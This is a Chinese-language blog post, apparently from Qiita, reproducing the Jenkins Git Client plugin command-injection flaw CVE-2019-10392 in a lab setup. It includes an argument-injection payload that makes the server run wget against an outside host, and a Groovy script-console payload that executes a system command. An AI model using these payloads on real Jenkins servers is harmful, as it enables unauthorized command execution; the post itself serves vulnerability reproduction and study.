Help us understand the problem. What is going on with this article?

CVE-2019-10392/Jenkins Git Client插件远程命令执行漏洞复现

环境准备

使用rpm -i jenkins-2.150.3-1.1.noarch.rpm安装Jenkins
使用service jenkins start启动Jenkins

随后访问http://ip:8080进行安装

安装过程中一定要选择选择插件安装

选择插件安装

安装插件清单中去掉Git Client的安装

去掉git的安装

如果不去掉,Jenkins将会安装最新的git插件,将无法复现漏洞

等待

然后等待选定的插件安装完即可

上传插件

本地安装

  • 3.重启Jenkins service jenkins restart

Payload

  • 1.新建一个工程 访问http://ip:8080/view/all/newJob输入工程名点击ok即可

新建工程

  • 2.RCE 在红框处填入--upload-pack=wget http://ip:port/1.txt随意远程请求一个文件

红框处

随后服务器将会收到连接请求

连接请求

连接请求

到此复现完成.该漏洞需要登录以后才能触发,且需要安装git client插件,显得很鸡肋.其实Jenkins后台一直有一个带回显的漏洞

访问http://ip:8080/script

Script 主控台

输入如下payload并点击执行即可

println("ifconfig".execute().getText())

ifconfig

Why do not you register as a user and use Qiita more conveniently?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
Comments
Sign up for free and join this conversation.
If you already have a Qiita account
Why do not you register as a user and use Qiita more conveniently?
You need to log in to use this function. Qiita can be used more conveniently after logging in.
You seem to be reading articles frequently this month. Qiita can be used more conveniently after logging in.
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away